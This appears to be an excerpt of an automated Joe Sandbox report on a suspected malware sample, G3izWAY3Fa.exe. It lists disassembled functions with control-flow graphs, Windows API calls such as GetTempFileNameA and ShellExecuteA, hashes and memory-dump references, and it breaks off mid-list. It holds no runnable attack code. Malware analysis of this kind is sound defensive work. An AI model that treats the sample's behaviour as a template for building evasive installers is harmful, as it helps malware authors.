                                • Instruction ID: ffaaac8e814952d4dd163c137c14166a37b00a477d69e33f5cc6849720afcf5a
                                • Opcode Fuzzy Hash: c26435dd92f2a1108dda5f18212d644254b55bfd3cfdadd86ae1b21390b81dbb
                                • Instruction Fuzzy Hash: 86010831908180ABDB116F795D44D6F27B0DA52365728473BF491B22E2C23C4942962E
                                Function 004056E3 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 32COMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 399 4056e3-4056ed 400 4056ee-405718 GetTickCount GetTempFileNameA 399->400 401 405727-405729 400->401 402 40571a-40571c 400->402 404 405721-405724 401->404 402->400 403 40571e 402->403 403->404
                                APIs
                                • GetTickCount.KERNEL32 ref: 004056F6
                                • GetTempFileNameA.KERNELBASE(?,0061736E,00000000,?), ref: 00405710
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1383362055.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1383290574.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1383409107.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1383451679.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1383451679.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1383451679.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1383607810.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1383607810.0000000000436000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1383607810.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1383607810.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1383607810.000000000047E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_G3izWAY3Fa.jbxd
                                Similarity
                                • API ID: CountFileNameTempTick
                                • String ID: "C:\Users\user\Desktop\G3izWAY3Fa.exe"$C:\Users\user\AppData\Local\Temp\$nsa
                                • API String ID: 1716503409-2753553320
                                • Opcode ID: fc5e126f8815d4696b9f295c06fae67d9d4e63728d0dbdda5093f58b42bfadad
                                • Instruction ID: 090c9869d25c952b380026dfe3028592f3e254e5657c021594612e0629f183dd
                                • Opcode Fuzzy Hash: fc5e126f8815d4696b9f295c06fae67d9d4e63728d0dbdda5093f58b42bfadad
                                • Instruction Fuzzy Hash: AFF0A736348204B7D7104F55EC04B9B7F5DDF91750F14C027F944DA1C0D6B1995597A5
                                Function 00403097 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 20COMMON
                                Download Yara Rule

                                Control-flow Graph

                                APIs
                                  • Part of subcall function 00405C3F: CharNextA.USER32(?,*?|<>/":,00000000,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\G3izWAY3Fa.exe",C:\Users\user\AppData\Local\Temp\,00000000,004030A3,C:\Users\user\AppData\Local\Temp\,00000000,00403215), ref: 00405C97
                                  • Part of subcall function 00405C3F: CharNextA.USER32(?,?,?,00000000), ref: 00405CA4
                                  • Part of subcall function 00405C3F: CharNextA.USER32(?,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\G3izWAY3Fa.exe",C:\Users\user\AppData\Local\Temp\,00000000,004030A3,C:\Users\user\AppData\Local\Temp\,00000000,00403215), ref: 00405CA9
                                  • Part of subcall function 00405C3F: CharPrevA.USER32(?,?,"C:\Users\user\Desktop\G3izWAY3Fa.exe",C:\Users\user\AppData\Local\Temp\,00000000,004030A3,C:\Users\user\AppData\Local\Temp\,00000000,00403215), ref: 00405CB9
                                • CreateDirectoryA.KERNELBASE(C:\Users\user\AppData\Local\Temp\,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,00403215), ref: 004030B8
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1383362055.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1383290574.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1383409107.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1383451679.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1383451679.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1383451679.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1383607810.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1383607810.0000000000436000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1383607810.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1383607810.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1383607810.000000000047E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_G3izWAY3Fa.jbxd
                                Similarity
                                • API ID: Char$Next$CreateDirectoryPrev
                                • String ID: 1033$C:\Users\user\AppData\Local\Temp\
                                • API String ID: 4115351271-3283962145
                                • Opcode ID: 6fc6148b77ece9d346d6d7cc43375dab10df03dac4f70bfb46dffa123947e942
                                • Instruction ID: 14cf73edb083f9294524d0cb591bdba299ebaa8e37fda96f2dae1f3ab35ccfa6
                                • Opcode Fuzzy Hash: 6fc6148b77ece9d346d6d7cc43375dab10df03dac4f70bfb46dffa123947e942
                                • Instruction Fuzzy Hash: 95D0C92160BD3032D66136263D0AFDF155C8F5236EFA1447BF809B61CA5B6C6A8219FF
                                Function 004063DD Relevance: 5.2, APIs: 4, Instructions: 236COMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 500 4063dd-4063e3 501 4063e5-4063e7 500->501 502 4063e8-406406 500->502 501->502 503 406614-406629 502->503 504 4066d9-4066e6 502->504 505 406643-406659 503->505 506 40662b-406641 503->506 507 406710-406714 504->507 508 40665c-406663 505->508 506->508 509 406774-406787 507->509 510 406716-406737 507->510 511 406665-406669 508->511 512 40668a 508->512 515 406690-406696 509->515 513 406750-406763 510->513 514 406739-40674e 510->514 516 406818-406822 511->516 517 40666f-406687 511->517 512->515 519 406766-40676d 513->519 514->519 521 406843 515->521 522 405e3b 515->522 520 40682e-406841 516->520 517->512 523 40670d 519->523 524 40676f 519->524 525 406846-40684a 520->525 521->525 526 405e42-405e46 522->526 527 405f82-405fa3 522->527 528 405ee7-405eeb 522->528 529 405f57-405f5b 522->529 523->507 533 4066f2-40670a 524->533 534 406824 524->534 526->520 535 405e4c-405e59 526->535 527->503 531 405ef1-405f0a 528->531 532 406797-4067a1 528->532 536 405f61-405f75 529->536 537 4067a6-4067b0 529->537 538 405f0d-405f11 531->538 532->520 533->523 534->520 535->521 539 405e5f-405ea5 535->539 540 405f78-405f80 536->540 537->520 538->528 541 405f13-405f19 538->541 542 405ea7-405eab 539->542 543 405ecd-405ecf 539->543 540->527 540->529 544 405f43-405f55 541->544 545 405f1b-405f22 541->545 546 405eb6-405ec4 GlobalAlloc 542->546 547 405ead-405eb0 GlobalFree 542->547 548 405ed1-405edb 543->548 549 405edd-405ee5 543->549 544->540 550 405f24-405f27 GlobalFree 545->550 551 405f2d-405f3d GlobalAlloc 545->551 546->521 552 405eca 546->552 547->546 548->548 548->549 549->538 550->551 551->521 551->544 552->543
                                Memory Dump Source
                                • Source File: 00000000.00000002.1383362055.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1383290574.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1383409107.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1383451679.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1383451679.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1383451679.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1383607810.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1383607810.0000000000436000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1383607810.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1383607810.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1383607810.000000000047E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_G3izWAY3Fa.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 8ad8b3a7fce677aa33c13c02e3180aa90519ee056083dbfcd0f6a1ae91265e6c
                                • Instruction ID: 95af8839098f806f541805b71f16133a603fad5641f47eebb8f014e75b9041d1
                                • Opcode Fuzzy Hash: 8ad8b3a7fce677aa33c13c02e3180aa90519ee056083dbfcd0f6a1ae91265e6c
                                • Instruction Fuzzy Hash: 58A13371D00229CBDF28CFA8C8447ADBBB1FF44305F25856AD856BB281D7789A86DF44
                                Function 004065DE Relevance: 5.2, APIs: 4, Instructions: 208COMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 553 4065de-4065e2 554 406604-406611 553->554 555 4065e4-4066e6 553->555 557 406614-406629 554->557 565 406710-406714 555->565 558 406643-406659 557->558 559 40662b-406641 557->559 561 40665c-406663 558->561 559->561 563 406665-406669 561->563 564 40668a 561->564 566 406818-406822 563->566 567 40666f-406687 563->567 568 406690-406696 564->568 569 406774-406787 565->569 570 406716-406737 565->570 571 40682e-406841 566->571 567->564 575 406843 568->575 576 405e3b 568->576 569->568 573 406750-406763 570->573 574 406739-40674e 570->574 577 406846-40684a 571->577 578 406766-40676d 573->578 574->578 575->577 579 405e42-405e46 576->579 580 405f82-405fa3 576->580 581 405ee7-405eeb 576->581 582 405f57-405f5b 576->582 583 40670d 578->583 584 40676f 578->584 579->571 587 405e4c-405e59 579->587 580->557 585 405ef1-405f0a 581->585 586 406797-4067a1 581->586 588 405f61-405f75 582->588 589 4067a6-4067b0 582->589 583->565 592 4066f2-40670a 584->592 593 406824 584->593 591 405f0d-405f11 585->591 586->571 587->575 594 405e5f-405ea5 587->594 595 405f78-405f80 588->595 589->571 591->581 596 405f13-405f19 591->596 592->583 593->571 597 405ea7-405eab 594->597 598 405ecd-405ecf 594->598 595->580 595->582 599 405f43-405f55 596->599 600 405f1b-405f22 596->600 601 405eb6-405ec4 GlobalAlloc 597->601 602 405ead-405eb0 GlobalFree 597->602 603 405ed1-405edb 598->603 604 405edd-405ee5 598->604 599->595 605 405f24-405f27 GlobalFree 600->605 606 405f2d-405f3d GlobalAlloc 600->606 601->575 607 405eca 601->607 602->601 603->603 603->604 604->591 605->606 606->575 606->599 607->598
                                Memory Dump Source
                                • Source File: 00000000.00000002.1383362055.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1383290574.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1383409107.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1383451679.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1383451679.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1383451679.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1383607810.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1383607810.0000000000436000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1383607810.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1383607810.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1383607810.000000000047E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_G3izWAY3Fa.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: b486484d64dd4cde6c37fee08c13c94b86683911648eeb5affe32ba80e56590e
                                • Instruction ID: 736e54d1ea8bc2ffbcc58a3ee687e8f06aed80bce92bf0dad63538ea203c4f31
                                • Opcode Fuzzy Hash: b486484d64dd4cde6c37fee08c13c94b86683911648eeb5affe32ba80e56590e
                                • Instruction Fuzzy Hash: 77913271D00229CBDF28CF98C844BADBBB1FF44305F15816AD856BB281D7789A86DF54
                                Function 004062F4 Relevance: 5.2, APIs: 4, Instructions: 205COMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 608 4062f4-4062f8 609 4062fe-406302 608->609 610 4063af-4063be 608->610 611 406843 609->611 612 406308-40631c 609->612 613 406614-406629 610->613 614 406846-40684a 611->614 617 4067e2-4067ec 612->617 618 406322-40632b 612->618 615 406643-406659 613->615 616 40662b-406641 613->616 620 40665c-406663 615->620 616->620 619 40682e-406841 617->619 621 406330-406360 618->621 622 40632d 618->622 619->614 623 406665-406669 620->623 624 40668a-406696 620->624 621->610 629 405e2c-405e35 621->629 622->621 626 406818-406822 623->626 627 40666f-406687 623->627 624->629 626->619 627->624 629->611 630 405e3b 629->630 631 405e42-405e46 630->631 632 405f82-405fa3 630->632 633 405ee7-405eeb 630->633 634 405f57-405f5b 630->634 631->619 637 405e4c-405e59 631->637 632->613 635 405ef1-405f0a 633->635 636 406797-4067a1 633->636 638 405f61-405f75 634->638 639 4067a6-4067b0 634->639 640 405f0d-405f11 635->640 636->619 637->611 641 405e5f-405ea5 637->641 642 405f78-405f80 638->642 639->619 640->633 643 405f13-405f19 640->643 644 405ea7-405eab 641->644 645 405ecd-405ecf 641->645 642->632 642->634 646 405f43-405f55 643->646 647 405f1b-405f22 643->647 648 405eb6-405ec4 GlobalAlloc 644->648 649 405ead-405eb0 GlobalFree 644->649 650 405ed1-405edb 645->650 651 405edd-405ee5 645->651 646->642 652 405f24-405f27 GlobalFree 647->652 653 405f2d-405f3d GlobalAlloc 647->653 648->611 654 405eca 648->654 649->648 650->650 650->651 651->640 652->653 653->611 653->646 654->645
                                Memory Dump Source
                                • Source File: 00000000.00000002.1383362055.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1383290574.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1383409107.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1383451679.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1383451679.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1383451679.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1383607810.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1383607810.0000000000436000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1383607810.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1383607810.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1383607810.000000000047E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_G3izWAY3Fa.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: a5c1a6d88fbf3736e083e35a306841f5f7567a3339756a66f66144e6d7487cc4
                                • Instruction ID: c975835c63a62796fcb7e955cfffcd5e326eaa1512836fcadbce1623bdfadb04
                                • Opcode Fuzzy Hash: a5c1a6d88fbf3736e083e35a306841f5f7567a3339756a66f66144e6d7487cc4
                                • Instruction Fuzzy Hash: AF816671D00229CFDF24CFA8C8447AEBBB1FB44305F25816AD856BB281C7789A86DF54
                                Function 00405DF9 Relevance: 5.2, APIs: 4, Instructions: 198COMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 655 405df9-405e1c 656 405e26-405e29 655->656 657 405e1e-405e21 655->657 659 405e2c-405e35 656->659 658 406846-40684a 657->658 660 406843 659->660 661 405e3b 659->661 660->658 662 405e42-405e46 661->662 663 405f82-406629 661->663 664 405ee7-405eeb 661->664 665 405f57-405f5b 661->665 668 405e4c-405e59 662->668 669 40682e-406841 662->669 673 406643-406659 663->673 674 40662b-406641 663->674 666 405ef1-405f0a 664->666 667 406797-4067a1 664->667 670 405f61-405f75 665->670 671 4067a6-4067b0 665->671 675 405f0d-405f11 666->675 667->669 668->660 676 405e5f-405ea5 668->676 669->658 677 405f78-405f80 670->677 671->669 678 40665c-406663 673->678 674->678 675->664 679 405f13-405f19 675->679 680 405ea7-405eab 676->680 681 405ecd-405ecf 676->681 677->663 677->665 682 406665-406669 678->682 683 40668a-406696 678->683 684 405f43-405f55 679->684 685 405f1b-405f22 679->685 686 405eb6-405ec4 GlobalAlloc 680->686 687 405ead-405eb0 GlobalFree 680->687 688 405ed1-405edb 681->688 689 405edd-405ee5 681->689 690 406818-406822 682->690 691 40666f-406687 682->691 683->659 684->677 693 405f24-405f27 GlobalFree 685->693 694 405f2d-405f3d GlobalAlloc 685->694 686->660 695 405eca 686->695 687->686 688->688 688->689 689->675 690->669 691->683 693->694 694->660 694->684 695->681
                                Memory Dump Source
                                • Source File: 00000000.00000002.1383362055.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1383290574.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1383409107.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1383451679.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1383451679.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1383451679.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1383607810.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1383607810.0000000000436000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1383607810.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1383607810.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1383607810.000000000047E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_G3izWAY3Fa.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 797fef13bb3e8e171cff3cae9b41bd7abdeca14a353df9249488f574514014e3
                                • Instruction ID: 0ba87498709856dc17a0c5f751d6ecfe3ae25d7b1153355424f504aba8ac83cf
                                • Opcode Fuzzy Hash: 797fef13bb3e8e171cff3cae9b41bd7abdeca14a353df9249488f574514014e3
                                • Instruction Fuzzy Hash: B4817772D04229CBDF24CFA8C8447AEBBB0FB44305F25816AD856BB2C0D7785A86DF44
                                Function 00406247 Relevance: 5.2, APIs: 4, Instructions: 180COMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 696 406247-40624b 697 406269-4062ac 696->697 698 40624d-406264 696->698 699 406614-406629 697->699 698->699 700 406643-406659 699->700 701 40662b-406641 699->701 702 40665c-406663 700->702 701->702 703 406665-406669 702->703 704 40668a-406696 702->704 705 406818-406822 703->705 706 40666f-406687 703->706 710 406843 704->710 711 405e3b 704->711 708 40682e-406841 705->708 706->704 712 406846-40684a 708->712 710->712 713 405e42-405e46 711->713 714 405f82-405fa3 711->714 715 405ee7-405eeb 711->715 716 405f57-405f5b 711->716 713->708 719 405e4c-405e59 713->719 714->699 717 405ef1-405f0a 715->717 718 406797-4067a1 715->718 720 405f61-405f75 716->720 721 4067a6-4067b0 716->721 722 405f0d-405f11 717->722 718->708 719->710 723 405e5f-405ea5 719->723 724 405f78-405f80 720->724 721->708 722->715 725 405f13-405f19 722->725 726 405ea7-405eab 723->726 727 405ecd-405ecf 723->727 724->714 724->716 728 405f43-405f55 725->728 729 405f1b-405f22 725->729 730 405eb6-405ec4 GlobalAlloc 726->730 731 405ead-405eb0 GlobalFree 726->731 732 405ed1-405edb 727->732 733 405edd-405ee5 727->733 728->724 734 405f24-405f27 GlobalFree 729->734 735 405f2d-405f3d GlobalAlloc 729->735 730->710 736 405eca 730->736 731->730 732->732 732->733 733->722 734->735 735->710 735->728 736->727
                                Memory Dump Source
                                • Source File: 00000000.00000002.1383362055.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1383290574.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1383409107.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1383451679.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1383451679.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1383451679.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1383607810.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1383607810.0000000000436000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1383607810.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1383607810.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1383607810.000000000047E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_G3izWAY3Fa.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: ab0e96aa9de7783a5fbfa8537471c17f47562fab6ccc56c1d015952012775d3a
                                • Instruction ID: 47c5cb8fc101d284839cddc633a7ca9263ac2e2456f843b1234a04abf02d33d1
                                • Opcode Fuzzy Hash: ab0e96aa9de7783a5fbfa8537471c17f47562fab6ccc56c1d015952012775d3a
                                • Instruction Fuzzy Hash: 0C713371D00229CBDF28CFA8C844BADBBF1FB44305F15806AD816BB281D7785A86DF54
                                Function 00406365 Relevance: 5.2, APIs: 4, Instructions: 170COMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 737 406365-406369 738 406370-406387 737->738 739 40636b-4063be 737->739 741 406614-406629 738->741 739->741 742 406643-406659 741->742 743 40662b-406641 741->743 745 40665c-406663 742->745 743->745 746 406665-406669 745->746 747 40668a-406696 745->747 748 406818-406822 746->748 749 40666f-406687 746->749 753 406843 747->753 754 405e3b 747->754 751 40682e-406841 748->751 749->747 755 406846-40684a 751->755 753->755 756 405e42-405e46 754->756 757 405f82-405fa3 754->757 758 405ee7-405eeb 754->758 759 405f57-405f5b 754->759 756->751 762 405e4c-405e59 756->762 757->741 760 405ef1-405f0a 758->760 761 406797-4067a1 758->761 763 405f61-405f75 759->763 764 4067a6-4067b0 759->764 765 405f0d-405f11 760->765 761->751 762->753 766 405e5f-405ea5 762->766 767 405f78-405f80 763->767 764->751 765->758 768 405f13-405f19 765->768 769 405ea7-405eab 766->769 770 405ecd-405ecf 766->770 767->757 767->759 771 405f43-405f55 768->771 772 405f1b-405f22 768->772 773 405eb6-405ec4 GlobalAlloc 769->773 774 405ead-405eb0 GlobalFree 769->774 775 405ed1-405edb 770->775 776 405edd-405ee5 770->776 771->767 777 405f24-405f27 GlobalFree 772->777 778 405f2d-405f3d GlobalAlloc 772->778 773->753 779 405eca 773->779 774->773 775->775 775->776 776->765 777->778 778->753 778->771 779->770
                                Memory Dump Source
                                • Source File: 00000000.00000002.1383362055.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1383290574.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1383409107.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1383451679.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1383451679.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1383451679.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1383607810.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1383607810.0000000000436000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1383607810.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1383607810.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1383607810.000000000047E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_G3izWAY3Fa.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 204a14aa4723f8bacec733d7555320540fe203445ac57d520a52ca53e11fdb0c
                                • Instruction ID: aa40489b15165fca9e2d73c9723ecf3d5b4a768092768a0400057c9dc9ec6b69
                                • Opcode Fuzzy Hash: 204a14aa4723f8bacec733d7555320540fe203445ac57d520a52ca53e11fdb0c
                                • Instruction Fuzzy Hash: F6714471D04229CFDF28CF98C844BAEBBB1FB44305F25816AD816BB281D7785A86DF54
                                Function 004062B1 Relevance: 5.2, APIs: 4, Instructions: 168COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000000.00000002.1383362055.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1383290574.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1383409107.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1383451679.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1383451679.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1383451679.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1383607810.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1383607810.0000000000436000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1383607810.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1383607810.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1383607810.000000000047E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_G3izWAY3Fa.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: be6e9d30e93fbb49eb3c361b8f1c94b7932ac8d56391751c3e2361f0828e0a06
                                • Instruction ID: f7c6f07f586ed293a1c67bf574783cb577a0acbc2814a7f5ecfd539a56c9ebac
                                • Opcode Fuzzy Hash: be6e9d30e93fbb49eb3c361b8f1c94b7932ac8d56391751c3e2361f0828e0a06
                                • Instruction Fuzzy Hash: AF715671D00229CBDF28CF98C844BADBBB1FF44305F15816AD816BB281C7785A46DF54
                                Function 00401DC1 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 41COMMON
                                Download Yara Rule
                                APIs
                                • ShellExecuteA.SHELL32(?,00000000,00000000,00000000,C:\Windows\temp,?), ref: 00401E07
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1383362055.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1383290574.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1383409107.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1383451679.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1383451679.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1383451679.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
